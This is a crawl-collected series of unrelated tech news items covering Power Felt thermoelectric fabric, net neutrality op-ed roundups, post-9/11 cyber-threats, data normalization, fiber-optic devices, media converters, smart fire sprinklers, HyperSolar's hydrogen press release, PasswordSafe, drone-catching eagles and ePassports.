Watch next: Aerospike discusses NoSQL for Big Data | <urn:uuid:964838cd-32fd-4b7c-b85c-e44abc5b113c> | CC-MAIN-2017-04 | http://www.internap.com/resources/video-big-data-important/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282926.64/warc/CC-MAIN-20170116095122-00522-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.883884 | 806 | 2.546875 | 3 |
Researchers at Wake Forest University are using cutting-edge carbon nanotube designs to turn active, mobile, non-coma-dreaming humans into the heat source that will generate power for their cell phones.
If you'll remember, that was the central assumption of TheMatrix (it was central to the plot, but tertiary in the concept behind the movie, right behind "We can make Keanu look cool with CGI" and "Lots of fanboys will pay to watch Carrie Anne Moss in skintight vinyl.")
Their research, which appears in the current version of Nano Letters led to the development of a material called Power Felt that is made of carbon nanotubes wrapped in plastic fibers designed to feel like fabric.
It creates a charge by exploiting differences in temperature between segments of the wearer's body, or between the body and cooler air around it.
Humans "waste a lot of energy as heat," according to Wake Forest graduate student Corey Hewitt, who helped research and write a paper on power-generating result of thermoelectric effect.
Most thermoelectric power-generating devices use Bismuth telluride, which is much more efficient than carbon nanotubes but can cost as much as $1,000 per kilogram. Power Felt, by comparison, could cost as little as $1 to the cost of a case on a smartphone.
The nanotube fabric used by the team stacks 72 layers of fabric to generate 140 nanowatts of power.
Other potential applications include wrapping it around a flashlight or other small device to power them during blackouts, or putting it in a coat to power personal electronics using the differing heat levels inside a coat and the cold outside according David Carroll, director of the Center for Nanotechnology and Molecular Materials.
Real, practical use is still some time off, though. Hewitt goes along with the use cases described by Carroll, but says the ability to power even something as small as an iPod is still some time off, though it is "definitely within reach."
Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook. | <urn:uuid:deff30ef-3864-4689-b93a-bf6dacf9cda5> | CC-MAIN-2017-04 | http://www.itworld.com/article/2729619/mobile/carbon-nanotubes-could-let-mobile-devices-use-humans-for-power--just-like-the-matrix.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00430-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951471 | 476 | 2.90625 | 3 |
Since the DC Circuit Court struck down the 2010 Open Internet Order in January, we’ve seen thousands of stories and columns written about net neutrality and the future of the Internet. The significant coverage underscores the important debate and upcoming decision by the FCC to craft rules that provide important consumer protections while not stifling investment, innovation and the freedom to create.
In recent weeks, we’ve seen several columns which share our concern that calls for overregulation of the Internet are extreme and unnecessary. These columns have also been asking what would happen if the Internet, the worlds most advanced communications technology, were suddenly burdened with heavy new rules.
Here are a few that we wanted to share:
A Taxi Commission for the Internet, The Wall Street Journal, L. Gordon Crovitz
The headache between Uber and Lyft and the taxicab regulations are a bitter reminder that regulators, even with the best intentions, can hinder innovation. Industries experiencing rapid technological change like broadband networks should be freed to innovate at the pace of technology – not the pace of government.
Internet Policy Shouldn’t Pit Service Providers Against Content Providers, The Washington Post, Ev Ehrlich
Ev Ehrlich says: “The industry’s critics need to rethink the white vs. black hat sophistry. Or, even better – let’s make Internet policy without any hats at all.”
How the FCC Can Save Net Neutrality and Still Ruin the Internet, The Huffington Post, Mike Montgomery
The Communications Act of 1934 gave us Title II regulations. Laws that old can’t possibly meet the needs of “today’s sprawling, busting, magically fragmented Internet, a miracle of technology.” 1996, when the Act was updated, isn’t even modern enough for this technology.
The Internet is Not a Water Pipe, The Huffington Post, Jason A. Llorenz
As the post says, the Internet “requires policy makers to think past the water pipe,” and other basic utilities. Over the last 20 years, the evolution and progress of the Internet are due to private investment and modern public policy. Let’s keep it that way.
Fast Lanes Saved the Internet, The Wall Street Journal, L. Gordon Crovitz
Modern broadband networks have benefited enormously from the performance and efficiency of flexible networks. They help facilitate Internet traffic during peak times. Reclassifying the Internet as a public utility would spell the end of permissionless innovation on the Internet. Putting bureaucrats in charge of the Internet would undermine the world’s greatest engine of innovation. | <urn:uuid:980ea38c-6e85-4c88-850a-d30629ed2967> | CC-MAIN-2017-04 | https://www.ncta.com/platform/public-policy/the-growing-concern-over-title-ii/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00430-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903761 | 534 | 2.578125 | 3 |
Fighting Cyber-Threats in the 21st CenturyBy CIOinsight | Posted 09-06-2011
In the 10 years since hijackers flew two passenger jets into the World Trade Center in New York City and a third one into the Pentagon, federal, state and local governments have struggled to secure transportation systems and physical infrastructure of all kinds from terrorist attacks.
However, the damage was done. The attacks ended -- probably forever -- Americans carefree belief that we were immune from the terrorist attacks that had plagued the Middle East, Europe and the Asia-Pacific regions for years.
Since then, Americans, along with technology-savvy people around the world, have had had to deal with another source of unease: a growing sense of insecurity about whether the computer systems people and institutions rely on are safe from theft, corruption and destruction by advanced cyber-threats.
In 2001, the closest thing we had to social media was SixDegrees.com, and cyber-threats mostly involved stalling Website operations, compromising PC performance or occasionally destroying database files.
However, in the past 10 years, cyber-threats have evolved into sophisticated attacks that can cripple large enterprises, steal credit card numbers and personal identities, empty bank accounts, and probe the labyrinthine depths of enterprise and government networks before draining databases full of sensitive documents or trade secrets.
Ten years ago, viruses were still primarily the work of amateurs, as online organized crime gangs didn't yet exist, said Mikko Hypponen, chief research officer at F-Secure. "People weren't writing keyloggers and viruses to make money," he added.
The most common way of getting infected was via a malicious executable file attached to an email message. That kind of attack would no longer work, as those emails would now be blocked, or "killed," by even the most basic spam filters.
It was easy to tell when a user was infected back then, as malware would produce an effect, such as crashing the computer. Now, highly sophisticated malware lurks silently on infected systems and harvests data. It's nearly impossible to tell if a user has been infected, since attackers don't want to be detected and lose their source of income, Hypponen said.
The attackers have changed post-9/11, as cyber-threats now come from criminals intent on stealing money, extremists out to make a point and nation-states engaged in espionage, to name just a few.
Shortly after the United States Navy SEAL operation successfully killed Osama bin Laden in his compound in Pakistan, there was an increase in probing attacks on defense systems trying to access information about the operation, Charles Dodd, a government consultant for cyber-defense, told eWEEK. Intruders were after highly classified information on who the United States talked to and worked with, as well as the information collected, he said.
Criminals are increasingly relying on the latest technology to plan and execute attacks on the Internet including the use of social networking to push out scams and they are focusing on developing mobile malware. In fact, Canadian and United States law enforcement organizations have complained about criminals relying on BlackBerry's encrypted communications to hide their activities.
To read the original eWeek article, click here: Fighting 21st Century Cyber-Threats | <urn:uuid:1a060f5f-95ed-45c8-8b4b-621af4b234d7> | CC-MAIN-2017-04 | http://www.cioinsight.com/print/c/a/Latest-News/Fighting-21st-Century-CyberThreats-672173 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00275-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.969317 | 672 | 2.515625 | 3 |
Data normalization reconsidered, Part 2, Business records in the 21st century
An examination of record keeping in computer systems
From the developerWorks archives
Date archived: January 13, 2017 | First published: January 12, 2012Relational databases have been fundamental to business systems for more than 25 years. Data normalization is a methodology that minimizes data duplication to safeguard databases against logical and structural problems, such as data anomalies. Relational database normalization continues to be taught in universities and practiced widely. Normalization was devised in the 1970s when the assumptions about computer systems were different from what they are today.
The first part of this 2-part series provided a historical review of record keeping and examined the problems associated with data normalization, such as the difficulty of mapping evolving business records to a normalized format. Since the Internet has lead to a widespread creation of business records in digital format, such as XML, it has become possible to store records in computer systems in their original format.
The second part of the series discusses alternative data representations like XML, JSON, and RDF to overcome normalization issues or to introduce schema flexibility. In the 21st century digitized business records are often created in XML to begin with. This paper compares XML to normalized relational structures and explains when and why XML enables easier and faster data access. After a discussion of JSON and RDF it concludes with a summary and suggestions for reconsidering normalization.
This content is no longer being updated or maintained. The full article is provided "as is" in a PDF file. Given the rapid evolution of technology, some steps and illustrations may have changed. | <urn:uuid:310d681c-da7c-4fa1-86a6-01607c681c0d> | CC-MAIN-2017-04 | http://www.ibm.com/developerworks/data/library/techarticle/dm-1201normalizationpart2/index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00423-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.945455 | 330 | 2.8125 | 3 |
1. Fiber Coupler
Fiber Optic Coupler, also called fiber optic adapter, is used for connecting and coupling of optical fiber connectors. According to the connection header of optical fiber connector to select model. The joint structure can be divided into: FC, SC, ST, LC, MTRJ, MPO, MU, SMA, DDI, DIN4, D4, E2000 forms, with good sintering technology to ensure excellent strength and stability (200 ~ 600gf insertion force).
Applications Of Fiber Optic Coupler
Fiber communication network
Broadband access network
2. Fiber Termination Box
Cable termination box, also known as optical fiber termination box or fiber termination box, is a connection device between several cores cables and termination equipments, mainly used to fix the cable termination, store and protect the remaining fiber optics, the splicing of fiber optic cable and fiber pigtail.
3. Fusion Splicer
Fusion splicer, the connection of two optical fiber cables, should joint the fiber inside the cable, because the fiber is just like glass, must re-fused special joint on the two ends, then the ends melt together, so that the light signal can be passed.
Light transmitting in fiber causes a loss, this loss is mainly composed of transmission loss of optical fiber itself and the splicing loss at optical fiber joints. Upon the order of optical cable, its own fiber optic transmission loss is also basically identified. The fiber joints splicing loss is determined by fiber optic itself and on-site construction. Efforts to reduce the optical fiber joints splice loss, can increase the transmission distance of optical fiber amplifier and improve the attenuation margin of fiber link.
4. Fiber Media Converter
Fiber optic media converter, is an Ethernet transmission media conversion unit to interchange the twisted-pair electrical signal of short distance and light signal of long distance.
Fiber converters are generally used in actual network environment where Ethernet cable can not cover and must use fiber optic to extend the transmission distance, the access layer application and usually located in metropolitan area networks; while it also plays a huge role in helping the fiber at the last kilometer connecting to the metro network and more outer layer network.
5. Fiber Optic Multiplexer
Fiber Optic Multiplexer is a fiber communication equipment to extend data transmission, it is mainly through the signal modulation, photoelectric conversion technology, using the optical transmission characteristics to achieve the purpose of remote transmission. Optical multiplexer generally used in pairs, divided into optical transmitter and optical receiver, optical transmitter completes the electrical/light switching, and optical signal is sent for optical fiber transmission; optical receiver mainly converts the light signals from the fiber receiver back into electrical signals, completing the light/electricity conversion. Optical multiplexer is used for remote data transmission.
Optical multiplexers are divided into many types, such as telephone optical multiplexer, Video Multiplexer, Video Audio Multiplexer, Video Data Multiplexer, video Audio Data Multiplexer and so on. And commonly used is Video Multiplexer (especially widely used in security industry).
Optical multiplexer is the terminal equipment of light signal transmission. Its principle is: a photoelectric conversion transmission equipment; put at both ends of the optical cable; one transmitter and receiver, just as its name implies multiplexer. So optical transmitter and receiver are used in pairs, usually buy optical multiplexer is said to buy a few pairs, instead of several. | <urn:uuid:b4ebce30-0ae8-40cc-a895-d31e8f77b815> | CC-MAIN-2017-04 | http://www.fs.com/blog/overview-of-common-fiber-optic-devices.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00359-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.900324 | 722 | 3.03125 | 3 |
Everyone is aware that selecting passwords wisely and safeguarding them should be an important priority, yet most people need to remember so many passwords that it’s nearly impossible to do so. Because of the need to recall dozens of passwords and keep up with their rotation many people are forced to use insecure shortcuts such as storing passwords in an unencrypted file or overusing the same password on many systems. PasswordSafe is one solution to the problem.
PasswordSafe is intended to be a secure solution for maintaining a list of passwords. It uses a secure, encrypted database to store each password and can only be accessed by providing the master password. Originally developed by Bruce Schneier’s Counterpane Labs it is now developed and administered by Jim Russell and Rony Shapiro as a SourceForge project. PasswordSafe can be downloaded here.
How is PasswordSafe more secure than storing passwords in a text file or database? All passwords within the database (called a safe) are encrypted using the Blowfish algorithm, also developed by Bruce Schneier, which has so far proven to be unbreakable. Provided a secure master password, referred to as the combination, has been chosen for the safe, no one should be able to decrypt the passwords stored within the safe, even if they obtain a copy of the file. For this reason, it is imperative to choose a strong master password. For guidance in selecting the master password, refer to Eric Wolfram’s “How to Pick a Safe Password“. Take caution to never lose or forget the combination (master password) for any safe. PasswordSafe intentionally has no way to recover a lost combination, because doing so would compromise its security.
Getting started with PasswordSafe
First, download and install the latest version of PasswordSafe which is available for all Windows platforms, including WinCE. For Linux users, there is a forked version (from the old 1.x series) called MyPasswordSafe available here, but its use is beyond the scope of this article.
The first time PasswordSafe is started, the following dialog appears:
Select “Create new database” and a prompt for the master password appears.
Weak passwords are discouraged with the following prompt.
If this prompt appears, a different master password should be created.
The newly created safe looks like this:
To create a new entry choose “Add Entry” from the Edit menu.
The password above has been created using the Random Password generator button on the right.
A prompt will appear asking if the default username should be the one supplied for the first entry.
Once the entry has been created it will show up in the safe.
Now would be a good time to save the database, by choosing .Save As. from the File menu. Once, the file has been saved, the title bar will show the filename instead of “
Using PasswordSafe is just as easy as it was to enter the sample password. To use the entry, right-click on it and choose “Copy Username to Clipboard”.
After pasting the username into website, you can double-click on the entry to speed-copy the password to the windows clipboard. Paste the password into the website and login as usual.
After a period of inactivity PasswordSafe will require the re-entry of the safe.s combination.
As more and more passwords are added to password safe, it becomes desirable to switch to “Nested Tree View” from the View menu. This changes the default display to the following:
Entries are developed into trees corresponding to the entry’s “group” field.
Changing Passwords with PasswordSafe
To change the password for a given entry, right-click on the entry and choose “Edit/View Entry”. The entry will then become available.
Click on “Show Password” and then “Generate” to generate a new password.
Once the password has been changed within password safe, don.t forget to update the password for the actual website or system with the new password!
There are a few other more advanced features of PasswordSafe that haven’t been covered here, but are adequately discussed in PasswordSafe’s help file. This introduction to PasswordSafe covers the basics enough to get started using it for password management. Here’s to never again forgetting a password! | <urn:uuid:43178372-47c2-4ba0-878b-464e3ebebe6b> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2005/01/10/password-management-with-passwordsafe/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281649.59/warc/CC-MAIN-20170116095121-00569-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.930017 | 902 | 2.734375 | 3 |
ZIFFPAGE TITLEDigging DeeperBy Mel Duvall | Posted 2005-04-06 Email Print
How does Federal Reserve chairman Alan Greenspan decide to raise rates a quarter point? By analyzing a potent mixture of raw pecuniary data and computerized economic intelligence against first-hand reports from key hubs of U.S. financial activity and five
Previous Fed chairmen, such as Greenspan's predecessor, Paul Volcker, had been primarily interested in aggregated metrics like the Consumer Price Index. That is a monthly measure of the change in prices urban shoppers pay for a fixed set of goods and services, including department store products and apartment rents.
But Greenspan thinks differently. When he arrived, economists started getting more requests from the chairman's office for disaggregated dataindividual points of information like the price of hot-rolled steel, construction-grade plywood or circuit boards.
Greenspan wants such data points to seek out telling shifts in the U.S. economy that large aggregated figures like the GDP sometimes disguise. A significant drop in demand for steel, for example, might not be noticed because it could be masked by increases in demand for non-steel-based products like furniture, clothing and shoes. But a dip in steel consumption may indicate that manufacturers of cars, dishwashers, microwaves and freezers are girding for a drop in demand for their products.
Wal-Mart does something similar, drilling down to compare, for example, sales of lightweight spin-casting fishing rods to determine subtle shifts in consumer tastes, perhaps brought on by a Hollywood movie such as A River Runs Through It, about fly-fishing in Montana. That might be invisible looking only at total sales of fishing rods.
For Greenspan, the summer of 1996 was spent studying U.S. productivity data. He was perplexed by figures showing a steady drop in productivity, or the output per hour of a worker.
The data didn't make sense next to his anecdotal evidence. His staff's ground reports and his own industry contacts indicated that new technology was helping companies dramatically boost productivity.
Greenspan had the Fed's economists conduct a massive research project, calculating the change in productivity in every major sector, from manufacturing to mining, finance, agriculture, education, health care and services. They found a number of flaws in how productivity was measured, particularly in service businesses such as insurance, law and banking, where technology had made a tremendous impact.
Automated teller machines, for example, let banks serve more customers faster. But because the main service they offeredmoney withdrawalswas largely provided for free, the benefits were not being recognized. The traditional productivity stat measures the amount of output in dollars that comes from an hour of labor. Because there was no output or income generated by these machines, there was no recognition of the increase in productivity banks achieved.
The research led Greenspan to conclude that productivity gains in the service industries were at least as high as, and probably higher than, the 3.6% average annual gains recorded in the manufacturing sector between 1994 and 1997, even though the data did not show it. That compared to average gains of 1% to 1.5% in the previous two decades.
As a result, Greenspan decided not to raise interest rates, even though many of his colleagues pressed for increases. Based on history, they feared, inflation would jump if interest rates did not slow down the economy. Instead, Greenspan theorized that gains in productivity would prevent prices from risingan informed hunch that the data would later prove correct.
"I was on the opposite side of the chairman in that debate," Meyer says. "But he was right. He deserves the credit for figuring it out."
Greenspan goes through a similar process of checking incoming data against insights gathered from the field before each Federal Open Market Committee meeting.
In the weeks leading up to the Feb. 1 gathering, economists with the San Francisco Federal Reserve Bank placed a number of calls to executives with the Long Beach and Los Angeles ports and at local shipping companies.
The ports, which combined are the nation's busiest, had been plagued by delays in the months leading up to Christmas. The concern for Greenspan was whether those delays would have trickle-down effects. Manufacturers might be waiting on parts and retailers might not be able to restock shelves, which might in turn mean consumers would hold off opening their wallets until those big-screen TVs arrived in stores.
The ports went through their own version of the perfect storm: A surge of new production from China of everything from toys to consumer electronics, and parts for larger products like computers, had the ports working at full capacity in the summer months. Then, heading into the fall, a sharp increase of imports from retailers like Wal-Mart and Target, whose fine-tuned supply chains have stores receiving merchandise just in time to be placed on shelves for Christmas, pushed the infrastructure and workforce past their limits.
Normally a ship arrives at a scheduled time, pulls into an open dock and is unloaded in three to four days. In late October, ships were often waiting more than six days to dock, then taking more than 10 days to unload because of a shortage of longshoremen, cranes and trains.
At its worst, as many as 86 ships were lined up offshore to be unloaded at the two ports. The result was a seaside traffic jam. "It was unbelievable," says David Arian, president of Local 13 of the International Longshore and Warehouse Union. "There was an armada of ships out in the harbor waiting to be unloaded."
Not only were the ports overwhelmed, the rail lines couldn't move containers from the ships fast enough. Union Pacific was left understaffed when an unexpectedly large number of employees accepted an early retirement plan.
Months might pass before the effects of this type of logjam would show up in national statistics like the GDP, retail sales or inventory figures. But near-real-time anecdotal reports from economists with the San Francisco reserve bank kept Greenspan informed.
"What we look for is major developments in our regions that may have national implications," says Fred Furlong, vice president of financial and regional research for the San Francisco Fed, whose region encompasses California, Arizona, Nevada, Utah, Oregon, Washington, Idaho, Hawaii and Alaska.
"Our position [as an arm of Greenspan] provides us with access to a large number of people on the ground with first-hand access to what's going on with the economy," he adds.
Prior to each open market committee meeting, San Francisco economists make close to 100 calls to key contacts, such as chief executives, finance officers and controllers with major employers in the region, such as Boeing, Intel, Union Pacific and the ports. Other reserve banks do the same.
Similarly, Wal-Mart's employee-led program to collect eyewitness intelligence on rivals' sales helped clinch its decision to slash prices before Christmas.
What Furlong's team found right before the February meeting was that the worst was over. Two thousand full-time and 7,000 part-time longshoremen had signed on to help the existing 5,000. Union Pacific had hired 4,000 workers, eliminating most of its staffing bottlenecks.
The message San Francisco Fed president Yellen delivered to Greenspan was that port delays were no longer an immediate threat to the economy. | <urn:uuid:ad14f92e-975e-4622-958a-cc0a368cecdd> | CC-MAIN-2017-04 | http://www.baselinemag.com/c/a/Projects-Data-Analysis/Inside-the-Mind-of-Alan-Greenspan/3 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00295-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.968813 | 1,517 | 2.53125 | 3 |
Black Box Explains...Media converters that are really switches
A media converter is a device that converts from one media type to another, for instance, from twisted pair to fiber to take advantage of fiber’s greater range. A traditional media converter is a two-port Layer 1 device that performs a simple conversion of only the physical interface. It’s transparent to data and doesn't “see” or manipulate data in any way.
An Ethernet switch can also convert one media type to another, but it also creates a separate collision domain for each switch port, so that each packet is routed only to the destination device, rather than around to multiple devices on a network segment. Because switches are “smarter” than traditional media converters, they enable additional features such as multiple ports and copper ports that autosense for speed and duplex.
Switches are beginning to replace traditional 2-port media converters, leading to some fuzziness in terminology. Small 4- or 6-port Ethernet switches are very commonly called media converters. In fact, anytime you see a “Layer 2” media converter or a media converter with more than two ports, it’s really a small Ethernet switch. | <urn:uuid:2b8ff605-e18f-435b-a8d4-4d529f111756> | CC-MAIN-2017-04 | https://www.blackbox.com/en-nz/products/black-box-explains/black-box-explains-media-converters-that-are-really-switches | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00505-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919836 | 251 | 2.984375 | 3 |
Photo: Rensselaer Polytechnic Institute seniors Erik Kauntz, Jake Pyzza, and Ryan Clapp designed and built an early prototype of a new "smart" fire suppression system.
Between 35 and 40 million fire sprinklers are now installed each year in the United States, more than in any other country in the world, according to Russell Fleming, executive vice president of the National Fire Sprinkler Association.
"The traditional use of fire sprinkler systems in the United States, as in other parts of the world, was for property protection and the resulting insurance savings," says Fleming. "However, it was found that sprinkler systems provided a life safety benefit as well. By the 1940s it began to be apparent that fires with large losses of life were taking place only in buildings without sprinkler protection."
Building codes in most jurisdictions now mandate fire sprinkler systems for certain classifications of buildings. That's the good news. However, such systems are not perfect. Indiscriminate soaking an office building, home, or workplace with water can cause tens of thousands of dollars worth of damage in places where there was no immediate threat from fire.
A group of graduating engineers from Rensselaer Polytechnic Institute set their sights on this problem, and have developed a promising solution. Seniors Jake Pyzza, Erik Kauntz, and Ryan Clapp researched, designed, and built an early prototype of a new "smart" fire suppression system that pinpoints the location of a fire in a building and douses the blaze with flame suppressants.
"Our sensors sweep a room, sense where the fire is, and then deliver a suppressant to just that area, while the sensor is still sweeping the rest of the room to see if the fire spread," says Pyzza. "If it continues to scan and doesn't see any more sources of fire, it turns the suppression system off to help minimize any damage to the room's contents."
The group developed and built their invention last year as their final project for a year-long capstone mechanical engineering course.
The new fire detection and suppression system is hardwired with a battery backup so it can function even if the building's electricity is shut off or unavailable. And the team is now investigating methods for directly transmitting the pinpointed location - down to the specific room - of the fire to the local fire department and/or private home security companies. The system's combination of ultraviolet and infrared sensors can locate and track a lit match up to 25 feet away, according to the group.
"It's a robust system, and we basically built it from the ground up," says Kauntz. "Combined, it took us hundreds of hours to design and put together."
The group's original idea was to develop a "firefighting grenade" that fire safety officials could throw into blaze, which gradually evolved into a home fire suppression system. The second idea stuck, particularly because municipalities are increasingly requiring new homes and home additions to have dedicated sprinkler systems.
"We felt there was a resounding need for an update for home sprinkler systems," said Clapp, a Product Design, and Innovation (PDI) major from Cairo, N.Y. "The original home sprinkler system was invented in 1873, by an RPI alumnus, and it hasn't really changed since then. So we felt it was time for an update, and that this was the perfect place to do it."
The students are currently investigating the possibility of licensing the system, securing a richer set of performance data, and potentially starting the formal process of filing a patent. | <urn:uuid:f6c8b15c-a595-4a91-b481-1ab08a69c3a2> | CC-MAIN-2017-04 | http://www.govtech.com/dc/articles/Smart-Fire-Sprinklers-Could-Prevent-Unnecessary.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00321-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957536 | 739 | 3.15625 | 3 |
SANTA BARBARA, CA--(Marketwired - Feb 11, 2014) - HyperSolar, Inc. (OTCQB: HYSR), the developer of a breakthrough technology to produce renewable hydrogen using sunlight and any source of water, today announced that its artificial photosynthesis technology is now capable of producing 1.2 volt open circuit voltage for use in direct solar hydrogen production. This achievement represents another 10% increase over the previous 1.1 volt reached late last year, a significant step towards truly renewable low cost hydrogen.
"We now see a path to production of hydrogen through immersion of low cost semiconductor materials in water," stated Tim Young. "Our approach uses only one type of inexpensive semiconducting material and reduces manufacturing complexity. Use of low cost materials with an industrial scaleable process and may even make it a viable approach for fabricating low-cost photovoltaic modules for other applications beyond water splitting."
"With the recent announcements of Hyundai, Honda, Toyota and other major auto manufacturers to begin shipping hydrogen fuel cell cars next year, there will be increased demand in the near future for clean hydrogen," continued Mr. Young. "We believe our technology can address two serious drawbacks impeding major adoption of hydrogen automobiles: First, the lack of hydrogen production infrastructure near the point of distribution or the fueling stations is addressed by our solar hydrogen production process. Second, hydrogen is currently produced from a fossil fuel -- natural gas -- in a process that releases substantial amounts of carbon dioxide into the atmosphere."
It is well known that the theoretical voltage for splitting water into hydrogen and oxygen is 1.23 volts, and approximately 1.5 volts in real-world systems. Achieving 1.5 volts using inexpensive solar cells has eluded the world. For example, silicon solar cells are the most inexpensive and abundant, but their 0.7 volt open circuit voltage is not enough to split water. Commercially available high voltage solar cells are considered to be far too expensive for use in hydrogen production.
HyperSolar's research is centered on developing a low-cost and submersible hydrogen production particle that can split water molecules under the sun, emulating the core functions of photosynthesis. Each particle is a complete hydrogen generator that contains a novel high voltage solar cell bonded to chemical catalysts by a proprietary encapsulation coating. A video of an early proof-of-concept prototype can be viewed at http://hypersolar.com/application.php.
About HyperSolar, Inc.
HyperSolar is developing a breakthrough, low cost technology to make renewable hydrogen using sunlight and any source of water, including seawater and wastewater. Unlike hydrocarbon fuels, such as oil, coal and natural gas, where carbon dioxide and other contaminants are released into the atmosphere when used, hydrogen fuel usage produces pure water as the only byproduct. By optimizing the science of water electrolysis at the nano-level, our low cost nanoparticles mimic photosynthesis to efficiently use sunlight to separate hydrogen from water, to produce environmentally friendly renewable hydrogen. Using our low cost method to produce renewable hydrogen, we intend to enable a world of distributed hydrogen production for renewable electricity and hydrogen fuel cell vehicles. To learn more about HyperSolar, please visit our website at http://www.HyperSolar.com.
Safe Harbor Statement
Matters discussed in this press release contain forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. When used in this press release, the words "anticipate," "believe," "estimate," "may," "intend," "expect" and similar expressions identify such forward-looking statements. Actual results, performance or achievements could differ materially from those contemplated, expressed or implied by the forward-looking statements contained herein, and while expected, there is no guarantee that we will attain the aforementioned anticipated developmental milestones. These forward-looking statements are based largely on the expectations of the Company and are subject to a number of risks and uncertainties. These include, but are not limited to, risks and uncertainties associated with: the impact of economic, competitive and other factors affecting the Company and its operations, markets, product, and distributor performance, the impact on the national and local economies resulting from terrorist actions, and U.S. actions subsequently; and other factors detailed in reports filed by the Company. | <urn:uuid:91f6fcae-f002-4020-a79d-df211fd93c65> | CC-MAIN-2017-04 | http://www.marketwired.com/press-release/hypersolar-reaches-significant-milestone-achieving-low-cost-solar-powered-hydrogen-production-otcqb-hysr-1877554.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00321-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927593 | 874 | 2.734375 | 3 |
The Dutch National Police is aware that the use of drones – and the number of drones incidents – is only going to increase as time goes by. So, they are trying to find ways to take them down without endangering people.
As Mark Wiebe, the innovation manager of the National Police Unit noted, there are situations in which drones are not allowed to fly. For example, if a drone blocks an air ambulance from landing, there has to be an effective and safe way for the police to remove the drone.
The police is looking into electronic solutions to intercept or jam the communication between a hostile drone and its operator so that they could take control of the drone themselves, and using drones with nets to “capture” the hostile drone, but they are also testing to see whether eagles could do the job better.
So they have contacted Guard From Above, a Dutch company specialized in training different kinds of birds of prey to intercept hostile drones of varying types and sizes.
“The animal instinct of a bird of prey is unique. They are made to be able to overpower fast-moving prey,” the company explains.
But they are mindful of the fact that the birds could get hurt by the drones.
“In nature, birds of prey often overpower large and dangerous prey. Their talons have scales, which protect them, naturally, from their victims’ bites. Of course, we are continuously investigating any extra possible protective measures we can take in order to protect our birds,” they added.
“The Dutch National Police has asked the Dutch Organization for Applied Scientific Research (TNO) to research the possible impact on the birds’ claws. The results are not yet known. We are working closely with the Dutch National Police on the development of our services.”
Here is a demonstration of the birds at work: | <urn:uuid:b1c0aeaa-3061-42e9-88f2-75c6ed35ff0c> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2016/02/02/eagles-vs-drones-a-low-tech-solution-for-a-high-tech-problem/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00533-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960085 | 381 | 2.875 | 3 |
A balanced relationship must exist between governments that require personal information from citizens entering their country and citizens who are willing to give up this information. The ePassport is a security model designed to ensure that this balance occurs as it ensures the authentication of citizens through a secure trust infrastructure and advanced privacy controls. The ePassport model is designed and intended to help nations thwart illegal border crossings of terrorists, organized crime and individuals looking to perform illicit activities.
According to a recent report, 93 of 193 U.N. member states now issue biometric ePassports to citizens. The U.S. remains the largest supplier, with more than 72 million documents released to citizens thus far. The second in line is the U.K., with more than 27 million issued to date. In fact, Europe issues the most ePassports per region, with Italy, France, Spain, the Netherlands and Germany being the leaders.
Currently, we are in a transitional period as governments slowly migrate from the first-generation basic access control (BAC) ePassports to the second, which supports extended access control (EAC). While BAC ePassports provide countless benefits—especially over legacy passports—the second-generation passport takes these advantages a step further. This migration can be attributed to the increased amount of options that EAC holders have in terms of who is allowed to access the personal information stored on cards. While BAC is secure, EAC takes that security to a second, more advanced level for those who wish to use it.
EAC passports come equipped with the most advanced security features known to date including iris recognition, finger printing capabilities and advanced cryptography. The second-generation ePassport is constructed with chip-cloning prevention and possesses the ability to release biometric information to trusted sources. This improved international verification method also includes a stronger, 128-bit data transfer encryption feature.
The sensitivity of such biometric data is a major concern for those looking to make the switch from the first- to second-generation ePassports. This is due to the fact that biometric data is non-revocable personally identifiable information (PII). Through the use of a public key infrastructure (PKI), EAC ePassports help to protect individual’s unique and biometric data from theft or miscreant activity, ensuring only authorized entities can access the data stored in the document. | <urn:uuid:f05052e4-3354-45e1-97b3-d587612514c2> | CC-MAIN-2017-04 | https://www.entrust.com/epassports-proving-to-be-a-widespread-method-of-border-control/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00469-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937777 | 485 | 2.5625 | 3 |
Kaspersky Lab Int. comments on the recent virus incident
